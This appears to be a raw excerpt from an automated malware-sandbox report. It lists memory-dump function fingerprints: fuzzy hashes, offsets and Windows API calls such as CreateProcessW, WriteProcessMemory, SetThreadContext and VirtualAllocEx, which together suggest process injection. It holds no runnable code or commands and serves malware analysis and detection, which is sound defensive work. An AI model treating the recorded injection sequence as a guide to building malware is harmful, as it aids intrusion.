                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0|v
                                                                      • API String ID: 0-3787906673
                                                                      • Opcode ID: 4dcb06da82c91a86dd74d1d0a5386c5cfa35784897fd5c5f3fd75466604f5a08
                                                                      • Instruction ID: 5294244a186fdf59c2f63330b8d57e8a578a5ac1bdc776ad47bd9e066d5b2fcd
                                                                      • Opcode Fuzzy Hash: 4dcb06da82c91a86dd74d1d0a5386c5cfa35784897fd5c5f3fd75466604f5a08
                                                                      • Instruction Fuzzy Hash: 33527A31A0062ACFDB14CF54C890AAEB7B6FF44304F5188AAE919AB251D774FD85CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f"A2
                                                                      • API String ID: 0-628476553
                                                                      • Opcode ID: c64bcb0f397b5ab4464e45068ccd0fd6e7acc269065df40047cf14df78cc34d3
                                                                      • Instruction ID: 61e456dc878f5b58e2f39810b4d634f612b58ec67e8e2a66b387879af9eb5fe5
                                                                      • Opcode Fuzzy Hash: c64bcb0f397b5ab4464e45068ccd0fd6e7acc269065df40047cf14df78cc34d3
                                                                      • Instruction Fuzzy Hash: F5A13674E052498FDB44CFA9C880ADEFFB2EF8A310F24816AD855AB325D7305946CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f"A2
                                                                      • API String ID: 0-628476553
                                                                      • Opcode ID: 2e11e2d5613d46a76d02bb94cde3c988f3659df03e6f6956266d971868327ff8
                                                                      • Instruction ID: 2670e5b10546ef6d15d34d69a940e354548a522c39dbb00a9846a4e1a98735ef
                                                                      • Opcode Fuzzy Hash: 2e11e2d5613d46a76d02bb94cde3c988f3659df03e6f6956266d971868327ff8
                                                                      • Instruction Fuzzy Hash: D6A154B0E052498FDB44CFA9C880AEEFBF2EF8A300F14816AD455AB325D7345946CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f"A2
                                                                      • API String ID: 0-628476553
                                                                      • Opcode ID: 6609e95e3eca934086924836841295b08f52505b082d797b42ea4615ff919d5c
                                                                      • Instruction ID: bc21f1e8bc3283f52ea24aa64f09b6043e54b075b1b85c56e6bb59cf2dfc80e8
                                                                      • Opcode Fuzzy Hash: 6609e95e3eca934086924836841295b08f52505b082d797b42ea4615ff919d5c
                                                                      • Instruction Fuzzy Hash: B281E2B4E002098FDB48CFE9C884AEEBBB2EF89300F10852AD519BB364D7345946CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e65022f673d04225484f27484ab8a2a1982b649842e81d95b6460e7caed8601
                                                                      • Instruction ID: b27ea363974d57b09640cfe0b3c416a638e70e0fddd64e78e847e1291018d259
                                                                      • Opcode Fuzzy Hash: 1e65022f673d04225484f27484ab8a2a1982b649842e81d95b6460e7caed8601
                                                                      • Instruction Fuzzy Hash: F80216B0B00205CFCBA4EB68C49466EBBE6BFC5604F198A69D456CB365CF35DC41CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac125834b17c85069c0ba529a29bc71e0c31a92cccaa75823dcdc9a0c0e586b1
                                                                      • Instruction ID: 9a4dec8c81bb0c0d35dfcdfb816fabad371ab40871b48b6c8f7316cd2cb11657
                                                                      • Opcode Fuzzy Hash: ac125834b17c85069c0ba529a29bc71e0c31a92cccaa75823dcdc9a0c0e586b1
                                                                      • Instruction Fuzzy Hash: 37B19B75E19209DFCB08CFE5E5805AEFBB6FB89310F20A42AD806F7254D73499428F16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 667a97b050c47007c75299756deec47fb2e8f12a8c4a94ffb762b817f2ef56cf
                                                                      • Instruction ID: 4de15739ea7e4420b82b95be134bf02e45d2f6cd3827c9b6d7f90feb325fd150
                                                                      • Opcode Fuzzy Hash: 667a97b050c47007c75299756deec47fb2e8f12a8c4a94ffb762b817f2ef56cf
                                                                      • Instruction Fuzzy Hash: 4D616975E4022ACBDB68CF65CD40BEEB7B6FF89300F1082A6D509A7654EB705AC09F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 504847d0af248814a4e253d790f4babb4084fafc5a1841ba15951ed372204fe8
                                                                      • Instruction ID: 4d6436f2a9c5e2e2a4e444e096f1a742af22596b823dd6996cd663a90cb0ad24
                                                                      • Opcode Fuzzy Hash: 504847d0af248814a4e253d790f4babb4084fafc5a1841ba15951ed372204fe8
                                                                      • Instruction Fuzzy Hash: 685174B4E0175A8FDB68CF65CC407D9BBB2AF89300F1482EAC409A7661EB705AC58F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 002a8214e931e4b23de3506f414138dc25a43d4a34808f15c4a0dfccdef92b85
                                                                      • Instruction ID: 5bb06d2e5807a261c85b17481d3dd2a9cbdb8dadd226a9befadc0831569b4222
                                                                      • Opcode Fuzzy Hash: 002a8214e931e4b23de3506f414138dc25a43d4a34808f15c4a0dfccdef92b85
                                                                      • Instruction Fuzzy Hash: E7515EB0D0061A8FDB88CFA9C9406AEFBF2FF89300F14D52AE419B7254D7748A418F54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2b09ef525aa8e97a13e45cbfce4b038dcb79c95776543da8af105e49d0e34da
                                                                      • Instruction ID: 7cb9c388edd7c5aa787020f14167413b45cc1127337d1d37896501a29d1d54db
                                                                      • Opcode Fuzzy Hash: f2b09ef525aa8e97a13e45cbfce4b038dcb79c95776543da8af105e49d0e34da
                                                                      • Instruction Fuzzy Hash: F2516CB0D0421A8FCB88DFAAC5406AEFBF2FF89300F14D52AE419B7254D7748A418F64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b4811e40c67fe7c1b2ea61891bfce3c5ec1be9c9dbfe30d4ae5eb2b1667fd76
                                                                      • Instruction ID: 2acc76995dc0761c46018262ea431ca12c66d7083e32d912ab41749dede6f82d
                                                                      • Opcode Fuzzy Hash: 9b4811e40c67fe7c1b2ea61891bfce3c5ec1be9c9dbfe30d4ae5eb2b1667fd76
                                                                      • Instruction Fuzzy Hash: 9D514E75E06209DFDB58CFE5E58069EFBB2EB89310F20A42AD40AF7254D7349942CF16
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ee4672dc15fde99c5bab2690e09e081d8b10551bdcdad2e6120892070f23f82
                                                                      • Instruction ID: 661cdf51f36824a1be579de71e0b75e8d6ecd457459d5322d872a8975a59ed5d
                                                                      • Opcode Fuzzy Hash: 7ee4672dc15fde99c5bab2690e09e081d8b10551bdcdad2e6120892070f23f82
                                                                      • Instruction Fuzzy Hash: 2731DAB1E116188BEB58DFABD84069EFBF7EFC8200F04C5BAC509A6254DB3459858F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7ff53f937deeda8847c7ba9dde83a756fc4306a36a2fd8d19d01e11a99ccce9
                                                                      • Instruction ID: de1be8856786f994bc8d71b9cdc76c7c0806daece6c59d56474331b779173472
                                                                      • Opcode Fuzzy Hash: e7ff53f937deeda8847c7ba9dde83a756fc4306a36a2fd8d19d01e11a99ccce9
                                                                      • Instruction Fuzzy Hash: E421B3B1E006189BEB58CF9BD8443DEBBF7AFC9310F14C16AD408A6258DB751A55CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d3d4cf3181a2e275e40762a9610f9ec1e85e428634e2efe5bdfa30da1ddbb12
                                                                      • Instruction ID: 83e9c3cee58e98b56acdd36e5f2c8f6fc261927764cb6a1c38573a4debdb67f1
                                                                      • Opcode Fuzzy Hash: 9d3d4cf3181a2e275e40762a9610f9ec1e85e428634e2efe5bdfa30da1ddbb12
                                                                      • Instruction Fuzzy Hash: 0821D8B0E006588BEB58CFABD85438EBBF7AFC9300F18C16AD408A6258DB741A45CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0255C0EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 41d7483b37811456e76147a7f10f96c005844fdd72feaa5ced61f98140dbb16d
                                                                      • Instruction ID: 6e9268d169ff6f8731c7c0c091ecb0fbcf082ff6403849bdc69dc261b3b5d84b
                                                                      • Opcode Fuzzy Hash: 41d7483b37811456e76147a7f10f96c005844fdd72feaa5ced61f98140dbb16d
                                                                      • Instruction Fuzzy Hash: 6D814570A00B158FD724DF69C45479ABBF1FF88208F008A2ED84ADBA50D735E949CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0CF11813
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 6301606f83e6e42c8e09b6be640b313e02844006d90bb6455ec8bbba5f2be262
                                                                      • Instruction ID: 5a6083ac31dfab9f9d8aefe9559ffe937846ba528bd8c943f904773f819fd7a8
                                                                      • Opcode Fuzzy Hash: 6301606f83e6e42c8e09b6be640b313e02844006d90bb6455ec8bbba5f2be262
                                                                      • Instruction Fuzzy Hash: D8510571D01328DFDB64CF99C980BDDBBB6AF48314F1485AAE908B7250DB319A89CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 0CF11813
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: a4471b2f2217c0d89c3e1a4dd70fdf5f0b2d914775d372ca40e1ff0f0ffe401c
                                                                      • Instruction ID: 6a0ac43b5fcab8af79353fb4e2ad9d0b4b1c60ca7edd4809049c76a1f3ede622
                                                                      • Opcode Fuzzy Hash: a4471b2f2217c0d89c3e1a4dd70fdf5f0b2d914775d372ca40e1ff0f0ffe401c
                                                                      • Instruction Fuzzy Hash: B051F671D01318DFDB64CF99C980BDDBBB6AF48314F1485A9E908B7250DB709A89CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0255E06A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 2cdbf95e3b0f4c6e91b1199098bfc476b01bc769b0f561514c9e2a3b430e74bb
                                                                      • Instruction ID: 202d4963f8c42fec0ab7e73eddce65563fccf0f24a62a096f5cdcc1959e435cd
                                                                      • Opcode Fuzzy Hash: 2cdbf95e3b0f4c6e91b1199098bfc476b01bc769b0f561514c9e2a3b430e74bb
                                                                      • Instruction Fuzzy Hash: AB510FB1C04358DFDB14CFA9C890ADEBFB5BF48314F24856AE819AB210D774A985CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0255E06A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 760f98ea6727af2a5974d72ba6d9e20acf030352d859c63563a2e96b8043c65f
                                                                      • Instruction ID: 13686b8e7b62860aef4485f1af47d80b1319f576e79c8e311828c1e2b5c26717
                                                                      • Opcode Fuzzy Hash: 760f98ea6727af2a5974d72ba6d9e20acf030352d859c63563a2e96b8043c65f
                                                                      • Instruction Fuzzy Hash: 9A51BEB1D00319DFDB14CF9AC894ADEBBB5FF48314F24852AE819AB210D774A985CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0255E06A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: adf84021175e9954bc36484ae8896957b5e5aaf5241483ef1bf1528ec6c750c3
                                                                      • Instruction ID: afdb2dc53cab250f6ca549414f54ef70a74347f4f5f44757ce66cf2cb7467dde
                                                                      • Opcode Fuzzy Hash: adf84021175e9954bc36484ae8896957b5e5aaf5241483ef1bf1528ec6c750c3
                                                                      • Instruction Fuzzy Hash: E151C0B1D00319DFDB14CF99C884ADEBFB5BF88314F24852AE819AB210D774A985CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0CF11CF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 7e2fc8114ca45d26c38962d4c1fe9246324cc74a70ef02c40500320e274318ad
                                                                      • Instruction ID: 6177a225261196278ba4419dacbcceede5a86c6cd0f7ebab4bfcc7b99fe4d727
                                                                      • Opcode Fuzzy Hash: 7e2fc8114ca45d26c38962d4c1fe9246324cc74a70ef02c40500320e274318ad
                                                                      • Instruction Fuzzy Hash: 7D21F4B59002599FDB10CF9AD984BDEBBF4FB48314F54842AE918A3240D774A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0CF11CF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: b72d6e1c09bb6064905d3ab2b4de536100935142e03dac12ec1b7fd77487db55
                                                                      • Instruction ID: 5f276e59c646ac30a0439d044f1a72799371c9184896d34c9f3c469712022825
                                                                      • Opcode Fuzzy Hash: b72d6e1c09bb6064905d3ab2b4de536100935142e03dac12ec1b7fd77487db55
                                                                      • Instruction Fuzzy Hash: 6321E3B19006599FCB10CF9AD885BDEBBF4FB48314F54842AE918A7250D774A944CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0CF11B6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 466522e4df81c72d19f18d2bf2dff3e5f25dbc4dac7a9927ca7f3046b79c2944
                                                                      • Instruction ID: bca760dd727167ea79b2eb9b883b0e7f858f95e747d61fea1abc39eaf6dd6b9f
                                                                      • Opcode Fuzzy Hash: 466522e4df81c72d19f18d2bf2dff3e5f25dbc4dac7a9927ca7f3046b79c2944
                                                                      • Instruction Fuzzy Hash: 6A2104B5901719DFCB10CF9AD984BDEBBF4FB48320F54842AE918A7250D374A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255711F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 8ce7cd6d8fd62eac4e353cb8cac7b3d795f54ba6a856419c811417bdafec376a
                                                                      • Instruction ID: ec456fa8ed47e78880daddc47596e9a1931d64ce2dc45143ed88388dd920740f
                                                                      • Opcode Fuzzy Hash: 8ce7cd6d8fd62eac4e353cb8cac7b3d795f54ba6a856419c811417bdafec376a
                                                                      • Instruction Fuzzy Hash: 2221DFB59002199FDB10CFAAD984ADEFBF9FB48324F14845AE814B7250D378A944CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255711F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 7bdf3b36abee6ffff8ca948c4df0d595d0de68958e1580327d58b94e1be72f5b
                                                                      • Instruction ID: 6716242b44f7d6243e37f328d8ef60a670c0b2185816e0fb3d14989465bede1d
                                                                      • Opcode Fuzzy Hash: 7bdf3b36abee6ffff8ca948c4df0d595d0de68958e1580327d58b94e1be72f5b
                                                                      • Instruction Fuzzy Hash: EB21E2B59002189FDB10CFAAD984ADEFBF8FB48324F14841AE914A3310D374A944CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0CF11B6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 93555f8310b5e45660ad270637873a46617ba297f399ce6ccd2f423049eb94d6
                                                                      • Instruction ID: 74c58decb42b23cc2bc5d71788a8513e931182637739c4fdf2bdf16b43016e4c
                                                                      • Opcode Fuzzy Hash: 93555f8310b5e45660ad270637873a46617ba297f399ce6ccd2f423049eb94d6
                                                                      • Instruction Fuzzy Hash: 5E21E2B59006599FCB10CF9AD884BDEBBF5FB48320F54842AE918A7250D374A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0CF11AA7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: b4f49911d5e7e1edeff30bc73232840b024a610d401a6310f094c61211f3ff50
                                                                      • Instruction ID: b319cd442d4baea43b3326228bbcf3585c71b732751fac94289349a754f80f17
                                                                      • Opcode Fuzzy Hash: b4f49911d5e7e1edeff30bc73232840b024a610d401a6310f094c61211f3ff50
                                                                      • Instruction Fuzzy Hash: 022127B1D006199FCB04CF9AD984BDEFBF8FB48214F54812AD818B3240D778A9448FA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0CF11AA7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: d7237966485d06ea80846727cc17fcf3c31f679e003592ad604b226042463439
                                                                      • Instruction ID: 0df2c6b89388330d3be4c1ecd25fb838759b4666f80302b4bc3605efd941dadd
                                                                      • Opcode Fuzzy Hash: d7237966485d06ea80846727cc17fcf3c31f679e003592ad604b226042463439
                                                                      • Instruction Fuzzy Hash: 032117B1D006199FCB14CF9AD985BDEFBF8FB48224F54812AD818B3240D778A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255C169,00000800,00000000,00000000), ref: 0255C37A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: e1026d60d60cfc3e18486c7137a8f4ddd9c989168ba636c3b06156060f1288fd
                                                                      • Instruction ID: 26d95c09a7eda76d61fa869292c91ceff5c708def809550f3a2cafe6bd098f24
                                                                      • Opcode Fuzzy Hash: e1026d60d60cfc3e18486c7137a8f4ddd9c989168ba636c3b06156060f1288fd
                                                                      • Instruction Fuzzy Hash: 231144B2C003189FDB10CF9AC444ADEFBF8AB88328F14842AE819B7200C374A544CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0708BFE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: d91eaebcb17b33b819436c708bb507a2f18ef08e271e647df6993d4cb7077afa
                                                                      • Instruction ID: 1194268ce2dd6ac0d8d870fa3e7de7a59e41ee88b7529e3abec222dfbfd0b2f5
                                                                      • Opcode Fuzzy Hash: d91eaebcb17b33b819436c708bb507a2f18ef08e271e647df6993d4cb7077afa
                                                                      • Instruction Fuzzy Hash: E52117B59006099FCB10DF9AC984BDEFBF8FB48324F148429E558A7240D778A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255C169,00000800,00000000,00000000), ref: 0255C37A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 3cacfbe9cb67164e1adb48d066f7ad05cc8bb5d59e932629a75df80f2490dc8d
                                                                      • Instruction ID: 7671152d4b5422bef8021a711edd242cfbba6cd9937301069ddbae126eab5f7b
                                                                      • Opcode Fuzzy Hash: 3cacfbe9cb67164e1adb48d066f7ad05cc8bb5d59e932629a75df80f2490dc8d
                                                                      • Instruction Fuzzy Hash: EE1103B29003189FDB10CF9AD444BDEBBF4EB89314F15886AE819B7200C374A945CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0708BFE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 92ae7ff973f60c274cac2c83e50e578a5f5aa205320eb79f2aea85253b499006
                                                                      • Instruction ID: d99f7b4c0392d7a56ad6f29306dbc0185aa28a46487c64d48769b339696e109a
                                                                      • Opcode Fuzzy Hash: 92ae7ff973f60c274cac2c83e50e578a5f5aa205320eb79f2aea85253b499006
                                                                      • Instruction Fuzzy Hash: 7F2126B19006099FCB10CF9AC884BDEFBF8FF48320F14842AE858A7240D778A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0CF11C2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: c335de31877a9d78dbc8801b12eef9d3d0742c97332e6533d056f8f8801bd1bf
                                                                      • Instruction ID: 8e6f7da1e9c7896e1ed049dce7ef18b7a61b8e28f8d064accb49b663134b9a7c
                                                                      • Opcode Fuzzy Hash: c335de31877a9d78dbc8801b12eef9d3d0742c97332e6533d056f8f8801bd1bf
                                                                      • Instruction Fuzzy Hash: 7E11E6B5900649DFCB10CF99D984BDEBFF8FB58324F148419E519A7210C375A554CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0CF11C2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: f117b6ff85bf65cdc6566f919e097e1cdb629e95abd8a3befd22b2d09d56a44d
                                                                      • Instruction ID: 82982a3b37e4907aac40b9d3d83413c6eaa63b8a3f086d8b4b3e63dd1a13d84f
                                                                      • Opcode Fuzzy Hash: f117b6ff85bf65cdc6566f919e097e1cdb629e95abd8a3befd22b2d09d56a44d
                                                                      • Instruction Fuzzy Hash: 4411F5B5900649DFCB10CF9AD984BDEBFF8FB98324F148819E929A7210C375A554CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
